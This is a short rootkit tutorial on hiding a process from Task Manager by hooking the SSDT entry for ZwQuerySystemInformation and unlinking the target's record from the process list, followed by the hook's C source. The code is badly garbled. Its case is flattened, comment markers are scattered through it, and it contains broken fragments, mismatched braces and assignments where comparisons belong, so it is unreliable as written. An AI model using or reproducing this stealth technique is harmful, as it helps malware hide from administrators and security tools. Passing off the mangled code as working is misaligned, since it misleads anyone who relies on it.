To hide a process from ring 0, hook the SSDT entry for ZwQuerySystemInformation. Task Manager enumerates processes by calling this service with the SystemProcessInformation class; the kernel fills the caller's buffer with a chain of per-process records (linked by NextEntryDelta), each carrying the process's PID, and the hook below walks that chain and unlinks the record whose PID matches the process to be hidden. Two practical caveats: the hook filters only the SystemProcessInformation class, so other enumeration paths still return the entry, and 64-bit Windows kernel patch protection (PatchGuard) treats SSDT modification as a fatal integrity violation, so the technique as written applies only to 32-bit kernels without that protection.
// Ntstatus myzwquerysysteminformation // (// _ success, // _ inoutpvoidsysteminformation, // _ inulongsysteminformationlength, // _ out_optpulongreturnlength //) /// {// ntstatus rstatus; // pfnzwquerysysteminformation oldzwinfo =\// (pfnzwquerysysteminformation) systemserviceaddr [getsysfuncindex (zwquerysysteminformation)]; // rstatus = oldzwinfo (systeminformationc) Lass, systeminformation, systeminformationlength, returnlength); // If (nt_success (rstatus) // {// If (systeminformationclass = systemprocessinformation) // {// psystem_processespprevprocessinfo = NULL; // The frontend of the current process // psystem_processespcurrentprocess = (psystem_processes) systeminformation; // while (pcurrentprocess! = NULL) // {// If (pcurrentprocess-> processid = g_hidepid) // {// If (pprevprocessinfo) // {// If (pcurrentprocess-> nextentrydelta) /// {// exclude the process to be hidden from the process chain // pprevprocessinfo-> nextentrydelta + = pcurrentprocess-> nextentrydelta; //} // else // {// the last bit of the excluded process in the chain // pprevprocessinfo-> nextentrydelta = 0; ///} // else // {// If (pcurrentprocess-> nextentrydelta) /// {/// direct systeminformation to the next process structure // systeminformation = (Pulong) systeminformation) + pcurrentprocess-> nextentrydelta; //} // else // {// only one process is available. // systeminformation = NULL; /// // next process // pprevprocessinfo = pcurrentprocess; // If (pcurrentprocess-> nextentrydelta) // {// pcurrentprocess = (psystem_processes) (ulong) pcurrentprocess) + pcurrentprocess-> nextentrydelta); // else // {// pcurrentprocess = NULL; //} // return rstatus ;//}